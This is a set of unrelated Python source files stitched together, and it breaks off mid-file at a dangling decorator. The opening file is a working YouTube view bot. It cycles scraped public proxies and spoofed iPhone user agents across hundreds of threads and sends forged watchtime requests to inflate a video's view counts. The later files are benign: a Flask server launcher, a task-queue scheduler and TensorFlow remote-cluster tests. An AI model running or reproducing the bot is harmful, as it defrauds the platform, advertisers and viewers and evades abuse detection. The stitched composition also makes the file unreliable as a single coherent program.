             "Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1")
# "1" scrapes proxies from public APIs; "2" reads them from proxys.txt.
proxy_loading = input("[1] Load Proxys from APIs\n[2] Load Proxys from proxys.txt\n")
# YouTube video/livestream id to target.
# NOTE(review): the prompt has no trailing newline or separator.
token = input("ID of your video/live")
class main(object):
    """Shared bot state plus a console status renderer."""

    def __init__(self):
        # Queues appear unused by the rest of the script; kept for
        # interface compatibility.
        self.combolist = Queue()
        self.Writeing = Queue()
        self.printing = []   # rolling log of status lines shown on screen
        self.botted = 0      # count of successful watchtime requests
        self.combolen = self.combolist.qsize()

    def printservice(self):  # print screen
        """Redraw the console twice a second with the counter and log tail."""
        while True:
            os.system(clear)
            print(Fore.LIGHTCYAN_EX + intro + Fore.LIGHTMAGENTA_EX)
            print(
                Fore.LIGHTCYAN_EX + f"Botted:{self.botted}\n")
            # Show only the last 10 log lines.  The original iterated
            # range(len - 10, len), which produces negative indices (and so
            # re-prints entries from the end) when fewer than 10 lines exist;
            # a negative slice handles short lists correctly and removes the
            # need for the blanket try/except.
            for line in self.printing[-10:]:
                print(line)
            time.sleep(0.5)
# Global state shared by every bot thread and the printer thread.
a = main()
class proxy():
    """Self-refreshing proxy pool.

    A background thread refreshes ``self.splited`` every 600 seconds, either
    from proxys.txt or from public proxy-list APIs depending on the
    ``proxy_loading`` choice made at startup.
    """
    global proxy_loading

    def update(self):
        """Refresh the proxy list forever, once every 600 seconds.

        Fix: the original appended each refresh onto ``self.splited``, so the
        list grew without bound with duplicate entries; the list is now built
        fresh each cycle and swapped in with a single assignment.  The ``\\r``
        stripping (previously only applied on the API path) now covers the
        file path too, and the proxy file is closed via a context manager.
        """
        while True:
            fresh = []
            if proxy_loading == "2":
                with open("proxys.txt", "r") as handle:
                    fresh = handle.read().split("\n")
            else:
                urls = ["https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt","https://api.proxyscrape.com/?request=getproxies&proxytype=http&timeout=10000&ssl=yes","https://www.proxy-list.download/api/v1/get?type=https&anon=elite"]
                for url in urls:
                    try:
                        fresh += requests.get(url).text.split("\n")
                    except Exception:
                        print("Proxy loading failed!")
            # Normalize Windows line endings.
            fresh = [entry.replace('\r', "") for entry in fresh]
            if fresh:
                # Single assignment so readers never observe a half-built list.
                self.splited = fresh
            time.sleep(600)

    def get_proxy(self):
        """Return one random proxy address from the pool."""
        return random.choice(self.splited)

    def FormatProxy(self):
        """Return the chosen proxy in requests' ``proxies=`` dict format."""
        return {'https': 'https://' + self.get_proxy()}

    def __init__(self):
        self.splited = []
        threading.Thread(target=self.update).start()
        # Give the first refresh a head start before callers ask for proxies.
        time.sleep(3)
# Single shared proxy pool; the constructor starts the refresh thread.
proxy1 = proxy()
def bot():
    """Worker loop: fetch the watch page through a random proxy, then call the
    watchtime stats endpoint so YouTube registers view time.

    Runs forever; every failure (dead proxy, parse miss, network error) is
    swallowed and the loop simply retries with a new proxy.
    """
    while True:
        try:
            # Fresh user agent, session, and proxy for each attempt.
            ua = random.choice(iPhone_UA)
            s = requests.session()
            random_proxy = proxy1.FormatProxy()
            resp = s.get("https://m.youtube.com/watch?v=" + token + "?disable_polymer=1",headers={'Host': 'm.youtube.com', 'Proxy-Connection': 'Keep-Alive', 'User-Agent': ua, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache'},proxies=random_proxy) # simple get request to youtube for the base URL
            # Extract the videostatsWatchtimeUrl base URL embedded in the page
            # markup and unescape it.  NOTE(review): this scraping depends on
            # YouTube's current page format and breaks silently if it changes.
            url = resp.text.split(r'videostatsWatchtimeUrl\":{\"baseUrl\":\"')[1].split(r'\"}')[0].replace(r"\\u0026",r"&").replace('%2C',",").replace("\/","/") #getting the base url for parsing
            cl = url.split("cl=")[1].split("&")[0] #parsing some infos for the URL
            ei = url.split("ei=")[1].split("&")[0]
            of = url.split("of=")[1].split("&")[0]
            vm = url.split("vm=")[1].split("&")[0]
            # Report watch time with the parsed parameters spliced in.
            s.get("https://s.youtube.com/api/stats/watchtime?ns=yt&el=detailpage&cpn=isWmmj2C9Y2vULKF&docid=" + token + "&ver=2&cmt=7334&ei=" + ei + "&fmt=133&fs=0&rt=1003&of=" + of +"&euri&lact=4418&live=dvr&cl=" + cl + "&state=playing&vm=" + vm + "&volume=100&c=MWEB&cver=2.20200313.03.00&cplayer=UNIPLAYER&cbrand=apple&cbr=Safari%20Mobile&cbrver=12.1.15E148&cmodel=iphone&cos=iPhone&cosver=12_2&cplatform=MOBILE&delay=5&hl=ru&cr=GB&rtn=1303&afmt=140&lio=1556394045.182&idpj=&ldpj=&rti=1003&muted=0&st=7334&et=7634",headers={'Host': 's.youtube.com', 'Proxy-Connection': 'Keep-Alive', 'User-Agent': ua, 'Accept': 'image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5', 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer': 'https://m.youtube.com/watch?v=' + token},proxies=random_proxy) # API GET request
            a.botted += 1
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt inside
            # worker threads; intentional best-effort retry, but worth confirming.
            pass
# Spawn the status printer plus exactly `maxthreads` bot workers.
maxthreads = int(input("How many Threads? Recommended: 500 - 1000\n"))
threading.Thread(target=a.printservice).start()
# Fix: the original loop started TWO bot threads per iteration, launching
# double the number of threads the user asked for.
for _ in range(maxthreads):
    threading.Thread(target=bot).start()
|
main.py | import threading
from os import path
import eventlet
import fire
from flask import Flask
from server.config import Config
from server.socket.log_watcher import LogWatcher
from server.socket.task_observer import TaskObserver
from template_support.file_storage import LocalFileStorage
from thumbnail.cache import ThumbnailCache
def _setup_frontend(app, basename=""):
"""Setup routing for single-page frontend"""
@app.route(path.join(basename, "/"), defaults={"_": None})
@app.route(path.join(basename, "/<path:_>"))
def frontend(_):
return app.send_static_file("index.html")
def create_application(config):
    """Create configured flask application."""
    # Imported here because the blueprint pulls in the database layer, which
    # must not be imported before eventlet monkey-patching in serve().
    from server.api import api as api_blueprint

    static_dir = path.abspath(config.static_folder)
    app = Flask(__name__, static_url_path="/static", static_folder=static_dir)
    app.debug = False

    app.config.update({
        "SQLALCHEMY_DATABASE_URI": config.database.uri,
        "SQLALCHEMY_TRACK_MODIFICATIONS": False,
        "MAX_CONTENT_LENGTH": config.max_upload_size,
        "CONFIG": config,
        "THUMBNAILS": ThumbnailCache(directory=config.thumbnail_cache_folder,
                                     capacity=config.thumbnail_cache_cap),
    })

    app.register_blueprint(api_blueprint, url_prefix="/api/v1")
    _setup_frontend(app)
    return app
def serve(
    host=None,
    port=None,
    db_host=None,
    db_port=None,
    db_name=None,
    db_user=None,
    db_secret=None,
    db_dialect=None,
    db_uri=None,
    static=None,
    videos=None,
):
    """Start Deduplication API Server.

    Every argument is optional; a provided value overrides the corresponding
    entry from the Config defaults (CLI flags via fire.Fire map onto these
    keyword arguments).
    """
    # Monkey-patch BEFORE importing modules that create sockets/threads,
    # which is why these imports are deferred into the function body.
    eventlet.monkey_patch()
    from server.model import database
    from server.queue.instance import request_transformer
    from server.socket.instance import socketio
    from server.queue import make_task_queue, make_log_storage

    # Read configuration
    config = Config()
    config.port = port or config.port
    config.host = host or config.host
    config.video_folder = videos or config.video_folder
    config.static_folder = static or config.static_folder
    config.database.port = db_port or config.database.port
    config.database.host = db_host or config.database.host
    config.database.name = db_name or config.database.name
    config.database.user = db_user or config.database.user
    config.database.secret = db_secret or config.database.secret
    config.database.dialect = db_dialect or config.database.dialect
    config.database.override_uri = db_uri or config.database.override_uri

    # Create application
    application = create_application(config)

    # Initialize database
    database.init_app(application)

    # Initialize file storage
    application.config["APP_FILE_STORAGE"] = LocalFileStorage(directory=config.file_store_directory)

    # Initialize task queue
    task_queue = make_task_queue(config, request_transformer)
    application.config["TASK_QUEUE"] = task_queue

    # Initialize SocketIO and forward task events to connected clients.
    socketio.init_app(application)
    task_queue.observe(TaskObserver(socketio))

    # Initialize task log storage
    log_storage = make_log_storage(config, task_queue)
    application.config["LOG_STORAGE"] = log_storage

    # Initialize task log watcher
    log_watcher = LogWatcher(socketio=socketio, log_storage=log_storage)
    application.config["LOG_WATCHER"] = log_watcher

    # Listen for task queue events in a background thread
    threading.Thread(target=task_queue.listen, daemon=True).start()

    # Publish log updates in a background thread
    threading.Thread(target=log_watcher.broadcast_logs, daemon=True).start()

    # Serve REST API (blocks until shutdown).
    socketio.run(application, host=config.host, port=config.port, log_output=True)
if __name__ == "__main__":
    # Expose serve() as a command line interface via python-fire.
    fire.Fire(serve)
|
TaskManager.py | # coding=utf-8
import threading
import time
import tool.tools as tool
from task import Task
from parser.ParserManager import ParserManager
from ui.presenter import dbPresenter
LOG_TAG = "TaskManager"
class TaskQueue(object):
    """Base FIFO task queue: items enter at the front, leave from the back."""

    def __init__(self):
        self._queue = []

    def put(self, t):
        """Enqueue a task (inserted at the front of the backing list)."""
        self._queue.insert(0, t)

    def get_header_load(self):
        """Return the load of the next task to be dequeued (the oldest one)."""
        return self._queue[-1].getLoad()

    def get(self):
        """Dequeue and return the oldest task."""
        return self._queue.pop()

    def size(self):
        """Return the number of queued tasks."""
        return len(self._queue)
class ProcessingTaskQueue(TaskQueue):
    """Queue holding the tasks currently being processed."""

    def __init__(self):
        super(ProcessingTaskQueue, self).__init__()

    def get_load_sum(self):
        """Return the combined load of all tasks in the queue."""
        load_sum = sum(task.getLoad() for task in self._queue)
        tool.log(LOG_TAG, "load_sum = %d" % load_sum)
        return load_sum

    def put(self, t):
        """Mark the task as processing and enqueue it."""
        if type(t) is Task:
            t.state = Task.__STATE_PROCESSING__
        super(ProcessingTaskQueue, self).put(t)
        # DB hook (disabled): persist the state change -> Processing
        # dbPresenter.UpdateTaskState(t.log_path, Task.__STATE_PROCESSING__)

    def remove(self, t):
        """Remove the given task if it is present; no-op otherwise."""
        if t in self._queue:
            self._queue.remove(t)

    def remove_by_id(self, qid):
        """Remove the first task whose name matches qid, if any."""
        for task in self._queue:
            if task.name == qid:
                self._queue.remove(task)
                return
class WaitingTaskQueue(TaskQueue):
    """Queue holding tasks that are waiting to be scheduled."""

    def __init__(self):
        super(WaitingTaskQueue, self).__init__()

    def put(self, t):
        """Mark the task as waiting (if needed) and enqueue it.

        Returns the (currently always False) result of the disabled DB update.
        """
        persisted = False
        if type(t) is Task and t.state != Task.__STATE_WAITING__:
            t.state = Task.__STATE_WAITING__
            # DB hook (disabled): persist the state change -> Waiting
            # persisted = dbPresenter.UpdateTaskState(t.log_path, Task.__STATE_WAITING__)
        super(WaitingTaskQueue, self).put(t)
        return persisted
# -------------------------------------------------------------------------------
class TaskListener(object):
    """
    The task state and progress changed listener
    Called By ParserManager
    Realized By Presenter
    (Listener for task state/progress changes; invoked by ParserManager and
    implemented by the Presenter layer.)
    """
    def on_task_progress_changed(self, task, progress):
        """
        The callback called when task progress changed
        :param task: target task for identity
        :param progress: the progress of target task
        """
    def on_task_state_changed(self, task):
        """
        The callback called when task state changed
        :param task: the target task
        """
# -------------------------------------------------------------------------------
class TaskManager(object):
    """
    Singleton TaskManager, used to manage and schedule all tasks centrally.
    Flow:
    1. If the processing queue is empty, an incoming task joins it directly.
    2. Otherwise, check whether the load of the next waiting task plus the
       total load of the processing queue exceeds _MAX_PROCESSING_:
       if it does, the task keeps waiting;
       if not, it moves into the processing queue.
    3. When ParserManager reports a task as finished, the task is removed
       from the processing queue.
    """
    # TODO: could be read from a configuration file instead of hard-coded.
    # Upper bound on the combined load processed concurrently (the original
    # comment describes it as "at most 50 threads" — the code actually
    # compares load sums, not thread counts).
    _MAX_PROCESSING_ = 50
    instance = None
    _waitingQueue = None
    _processingQueue = None
    _task_handler = None
    _running = False
    _task_listener = None
    def __new__(cls, *args, **kwargs):
        # Classic __new__-based singleton: queues and flags are initialized
        # only on first instantiation.
        if not cls.instance:
            cls.instance = super(TaskManager, cls).__new__(cls, *args, **kwargs)
            cls._waitingQueue = WaitingTaskQueue()
            cls._processingQueue = ProcessingTaskQueue()
            cls._running = True
            cls._task_handler = None
            cls._task_listener = None
        return cls.instance
    # public
    def start(self):
        """Start the scheduling thread (idempotent while one is running)."""
        if not self._task_handler:
            self._task_handler = threading.Thread(target=self._handle_tasks)
            self._task_handler.start()
    def add_task(self, task):
        """Queue a task for scheduling."""
        self._waitingQueue.put(task)
    def close(self):
        """Stop scheduling and drop all state, including the singleton."""
        self._running = False
        self._waitingQueue = None
        self._processingQueue = None
        self._task_handler = None
        self.instance = None
    def set_task_listener(self, l):
        """Register the listener notified of task state/progress changes."""
        self._task_listener = l
    # private
    def _handle_tasks(self):
        """Scheduling loop: move tasks from waiting to processing under the
        _MAX_PROCESSING_ load budget and hand them to ParserManager."""
        tool.log(LOG_TAG, "_handle_tasks start")
        while self._running:
            # Poll once per second.
            time.sleep(1)
            # Nothing waiting: keep polling.
            if self._waitingQueue.size() <= 0:
                continue
            # With tasks in flight, check whether the budget allows one more.
            if self._processingQueue.size() > 0:
                # Current total load.
                current_load = self._processingQueue.get_load_sum()
                # Load of the next waiting task.
                future_load = self._waitingQueue.get_header_load()
                # Admit the task only if the combined load stays within budget.
                if current_load + future_load <= TaskManager._MAX_PROCESSING_:
                    # Move it to the processing queue and start a ParserManager.
                    t = self._waitingQueue.get()
                    self._processingQueue.put(t)
                    pm = ParserManager(t)
                    if self._task_listener:
                        pm.set_task_listener(self._task_listener)
                    pm.execute()
                    tool.log(LOG_TAG, "_handle_tasks: start ParserManager 1")
                else:
                    tool.log(LOG_TAG, "_handle_tasks: please hold on")
            else:
                # Processing queue empty: admit the next waiting task directly.
                task = self._waitingQueue.get()
                # Compute the task's load (side effect of getLoad()).
                task.getLoad()
                self._processingQueue.put(task)
                if self._task_listener:
                    self._task_listener.on_task_state_changed(task)
                    tool.log(LOG_TAG, "tagggggggggggggggg")
                    tool.log(LOG_TAG, "state = %d" % task.state)
                # Start the task.
                pm = ParserManager(task)
                pm.set_task_listener(self._task_listener)
                pm.execute()
|
remote_cluster_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for remote eager execution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import cluster_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import executor
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import server_lib
JOB_NAME = "remote_device"
def get_server_def(job_name, local_server_port, remote_server_addresses,
                   task_index):
  """Returns a server def with a single job + multiple tasks."""
  cluster_def = cluster_pb2.ClusterDef()
  job_def = cluster_def.job.add()
  job_def.name = job_name
  # Task 0 is the local server; remote tasks are numbered from 1 in order.
  addresses = ["localhost:%d" % local_server_port]
  addresses.extend(remote_server_addresses)
  for task_id, address in enumerate(addresses):
    job_def.tasks[task_id] = address
  return tensorflow_server_pb2.ServerDef(
      cluster=cluster_def,
      job_name=job_name,
      task_index=task_index,
      protocol="grpc")
class DynamicClusterTest(test.TestCase, parameterized.TestCase):
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(DynamicClusterTest, self).__init__(methodName)
self._cached_server1 = server_lib.Server.create_local_server()
self._cached_server2 = server_lib.Server.create_local_server()
self._cached_server3 = server_lib.Server.create_local_server()
self._cached_server4 = server_lib.Server.create_local_server()
self._cached_server1_target = self._cached_server1.target[len("grpc://"):]
self._cached_server2_target = self._cached_server2.target[len("grpc://"):]
self._cached_server3_target = self._cached_server3.target[len("grpc://"):]
self._cached_server4_target = self._cached_server4.target[len("grpc://"):]
self.server_def_s1 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[self._cached_server1_target],
task_index=0)
self.server_def_s1_s2 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target
],
task_index=0)
self.server_def_s1_s3 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server3_target
],
task_index=0)
self.server_def_s4_s3 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server4_target, self._cached_server3_target
],
task_index=0)
self.server_def_s1_s2_s3 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target,
self._cached_server3_target
],
task_index=0)
self.server_def_s1_s2_s3_s4 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target,
self._cached_server3_target, self._cached_server4_target
],
task_index=0)
self.device_local = "/job:%s/replica:0/task:0/device:CPU:0" % JOB_NAME
self.device_t1 = "/job:%s/replica:0/task:1/device:CPU:0" % JOB_NAME
self.device_t2 = "/job:%s/replica:0/task:2/device:CPU:0" % JOB_NAME
self.device_t3 = "/job:%s/replica:0/task:3/device:CPU:0" % JOB_NAME
self.device_t4 = "/job:%s/replica:0/task:4/device:CPU:0" % JOB_NAME
def setUp(self):
super(DynamicClusterTest, self).setUp()
os.environ["TF_ENABLE_EAGER_CLIENT_STREAMING_ENQUEUE"] = str(False)
local_port = pywrap_tfe.TF_PickUnusedPortOrDie()
context.set_server_def(
server_def=get_server_def(
JOB_NAME,
local_server_port=local_port,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target
],
task_index=0))
  def tearDown(self):
    super(DynamicClusterTest, self).tearDown()
    # Enter a None device scope to clear any device context a failing test
    # may have left open, so later tests are not pinned to a stale device.
    ops.device(None).__enter__()
    # Reset the eager context so the next test starts with a fresh cluster.
    context._reset_context()
@test_util.run_in_async_and_sync_mode
def testServerAdded(self):
"""Add a server to cluster, and run remote ops on it."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
context.update_server_def(server_def=self.server_def_s1_s2_s3)
with ops.device(self.device_t3):
x2 = array_ops.ones([2, 2])
# Test new server accessing resources on old server
with ops.device(self.device_t3):
y = math_ops.matmul(x1, x2)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
# Test old server accessing resources on new server
with ops.device(self.device_t2):
y = math_ops.matmul(x1, x2)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testServerRemoved(self):
  """Remove a server from cluster, and run ops on cluster."""
  with ops.device(self.device_t1):
    x1 = array_ops.ones([2, 2])
  with ops.device(self.device_t2):
    x2 = array_ops.ones([2, 2])
  with ops.device(self.device_t1):
    y = math_ops.matmul(x1, x2)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Shrink the cluster to just s1; device t2 no longer exists.
  context.update_server_def(server_def=self.server_def_s1)
  with ops.device(self.device_t1):
    y = math_ops.matmul(x1, x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Running ops on removed server s2 throws an exception
  with self.assertRaises(errors.InvalidArgumentError) as cm:
    with ops.device(self.device_t2):
      y = math_ops.matmul(x1, x2)
  self.assertIn("unknown device", cm.exception.message)
  # TODO(haoyuzhang): raise and catch exception when accessing tensors on
  # the removed servers.
@test_util.run_in_async_and_sync_mode
def testServerReplaced(self):
  """Replace remote host_port for a task, and run ops on cluster."""
  # Build an input on task 1, which survives the cluster update.
  with ops.device(self.device_t1):
    operand = array_ops.ones([2, 2])
  # Swap task 2's backing server from s2 to s3.
  context.update_server_def(server_def=self.server_def_s1_s3)
  # The replacement server must serve ops under the same device name.
  with ops.device(self.device_t2):
    product = math_ops.matmul(operand, operand)
  np.testing.assert_array_equal([[2, 2], [2, 2]], product.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionServerAdded(self):
  """Add a server to cluster, and run remote function on it."""
  with ops.device(self.device_t1):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    return math_ops.matmul(i, i)

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  # Grow the cluster; the registered function must reach the new worker.
  context.update_server_def(server_def=self.server_def_s1_s2_s3)
  # New server runs the function on an old server's tensor.
  with ops.device(self.device_t3):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Old server runs the function on the new server's tensor.
  with ops.device(self.device_t3):
    x2 = array_ops.ones([2, 2])
  with ops.device(self.device_t1):
    y = worker_fn(x2)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionServerRemoved(self):
  """Remove a server from cluster, and run ops on cluster."""

  @def_function.function
  def worker_fn(i):
    return math_ops.matmul(i, i)

  with ops.device(self.device_t1):
    x1 = array_ops.ones([2, 2])
  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  # Shrink the cluster to just s1; device t2 no longer exists.
  context.update_server_def(server_def=self.server_def_s1)
  with ops.device(self.device_t1):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Running functions on removed server s2 throws an exception
  with self.assertRaises(errors.InvalidArgumentError) as cm:
    with ops.device(self.device_t2):
      y = worker_fn(x1)
  # Match the message the same way testServerRemoved does. The previous
  # pattern had a stray leading space (" unknown device"), making the
  # assertion needlessly brittle and inconsistent with the op-based test.
  self.assertIn("unknown device", cm.exception.message)
  # TODO(haoyuzhang): raise and catch exception when accessing tensors on
  # the removed servers.
@test_util.run_in_async_and_sync_mode
def testFunctionServerRemovedAddedBack(self):
  """Add and remove a server, and run functions on cluster."""
  with ops.device(self.device_t1):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    return math_ops.matmul(i, i)

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  # Grow to three workers and run on the new one.
  context.update_server_def(server_def=self.server_def_s1_s2_s3)
  with ops.device(self.device_t3):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Shrink back to two workers.
  context.update_server_def(server_def=self.server_def_s1_s2)
  with ops.device(self.device_t2):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Re-add the third worker; the function must be (re)registered there.
  context.update_server_def(server_def=self.server_def_s1_s2_s3)
  with ops.device(self.device_t3):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionServerReplaced(self):
  """Replace remote host_port for a task, and run functions on cluster."""
  with ops.device(self.device_t1):
    operand = array_ops.ones([2, 2])

  @def_function.function
  def square_fn(i):
    return math_ops.matmul(i, i)

  # Trace and register the function before the cluster changes.
  square_fn.get_concrete_function(operand)
  # Swap task 2's backing server from s2 to s3.
  context.update_server_def(server_def=self.server_def_s1_s3)
  # The registered function must run on the replacement server.
  with ops.device(self.device_t2):
    result = square_fn(operand)
  np.testing.assert_array_equal([[2, 2], [2, 2]], result.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionRegisteredAndRemoved(self):
  """Update cluster when other function are registered and removed."""
  with ops.device(self.device_local):
    x1 = array_ops.ones([2, 2])
  num_calls = 30
  self._coord = coordinator.Coordinator()

  def update_server_def_fn():
    with self._coord.stop_on_exception():
      for i in range(num_calls):
        # Alternate between two cluster layouts while functions churn.
        context.update_server_def(
            server_def=(self.server_def_s1_s2 if i %
                        2 == 0 else self.server_def_s1_s3))

  t = threading.Thread(target=update_server_def_fn)
  t.start()
  # Concurrently register and drop freshly traced functions.
  for _ in range(num_calls):

    @def_function.function
    def worker_fn(i):
      return math_ops.matmul(i, i)

    concrete_fn = worker_fn.get_concrete_function(x1)
    del concrete_fn
    del worker_fn
  # No exception should be thrown from the thread
  self._coord.join([t])
def testPendingNodesServerReplaced(self):
  """Update cluster when nodes are still pending on remote workers."""
  # NOTE(review): unlike most siblings this test is not decorated with
  # @test_util.run_in_async_and_sync_mode — confirm whether intentional.
  with ops.device(self.device_local):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    return math_ops.matmul(i, i)

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  # Add enough ops so they are pending when changing the cluster
  num_nodes = 10
  ret = [None] * num_nodes
  for i in range(num_nodes):
    with ops.device(self.device_t1):
      ret[i] = worker_fn(x1)
  # While nodes are still pending on worker s1, replace worker s2 with s3.
  context.update_server_def(server_def=self.server_def_s1_s3)
  with ops.device(self.device_t2):
    y = worker_fn(x1)
  for i in range(num_nodes):
    np.testing.assert_array_equal([[2, 2], [2, 2]], ret[i].numpy())
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testMultiThreadPendingNodesServerReplaced(self):
  """Update cluster when other remote function calls are being launched.

  Two worker threads issue remote calls while a third thread swaps the
  cluster layout; a shared lock serialises calls against updates.
  """
  with ops.device(self.device_local):
    x1 = array_ops.ones([2, 2])
  num_calls = 10
  lock = threading.Lock()

  @def_function.function
  def worker_fn(i):
    return math_ops.matmul(i, i)

  def thread_fn(device, results):
    for i in range(num_calls):
      # `with lock:` releases the lock even if the remote call raises;
      # the previous bare acquire()/release() pair would leave the lock
      # held on an exception and deadlock the other threads.
      with lock:
        with ops.device(device):
          y = worker_fn(x1)
        results[i] = y.numpy()

  def update_server_def_fn():
    for i in range(num_calls):
      with lock:
        context.update_server_def(
            server_def=(self.server_def_s1_s2 if i %
                        2 == 0 else self.server_def_s1_s3))

  t1_results = [None] * num_calls
  t2_results = [None] * num_calls
  threads = []
  threads.append(
      threading.Thread(target=thread_fn, args=(self.device_t1, t1_results)))
  threads.append(
      threading.Thread(target=thread_fn, args=(self.device_t2, t2_results)))
  threads.append(threading.Thread(target=update_server_def_fn))
  for t in threads:
    t.start()
  for t in threads:
    t.join()
  for result in t1_results + t2_results:
    np.testing.assert_array_equal([[2, 2], [2, 2]], result)
def testMultiThreadPendingNodesLockFree(self):
  """Update cluster when other remote function calls are being launched."""
  # Unlike testMultiThreadPendingNodesServerReplaced, no lock serialises
  # the calls against the updates — the update path must be safe on its own.
  with ops.device(self.device_t1):
    x1 = array_ops.ones([2, 2])
  num_calls = 10
  self._coord = coordinator.Coordinator()

  @def_function.function
  def worker_fn(i):
    return math_ops.matmul(i, i)

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)

  def thread_fn(device, results):
    for i in range(num_calls):
      with self._coord.stop_on_exception():
        with ops.device(device):
          results[i] = worker_fn(x1).numpy()

  def update_server_def_fn():
    for _ in range(30):
      with self._coord.stop_on_exception():
        context.update_server_def(self.server_def_s1_s2)

  t1_results = [None] * num_calls
  t2_results = [None] * num_calls
  threads = []
  threads.append(
      threading.Thread(target=thread_fn, args=(self.device_t1, t1_results)))
  threads.append(
      threading.Thread(target=thread_fn, args=(self.device_t2, t2_results)))
  threads.append(threading.Thread(target=update_server_def_fn))
  for t in threads:
    t.start()
  self._coord.join(threads)
  for result in t1_results + t2_results:
    np.testing.assert_array_equal([[2, 2], [2, 2]], result)
@test_util.run_in_async_and_sync_mode
def testDistributedFunctionServerAdded(self):
  """Add a server to cluster, and run distributed function on it."""
  with ops.device(self.device_t1):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    # The function body itself spans devices (matmul pinned to t2).
    with ops.device(self.device_t2):
      mul = math_ops.matmul(i, i)
    return mul - array_ops.zeros_like(mul)

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  context.update_server_def(server_def=self.server_def_s1_s2_s3)
  # The new worker t3 must be able to drive the multi-device function.
  with ops.device(self.device_t3):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
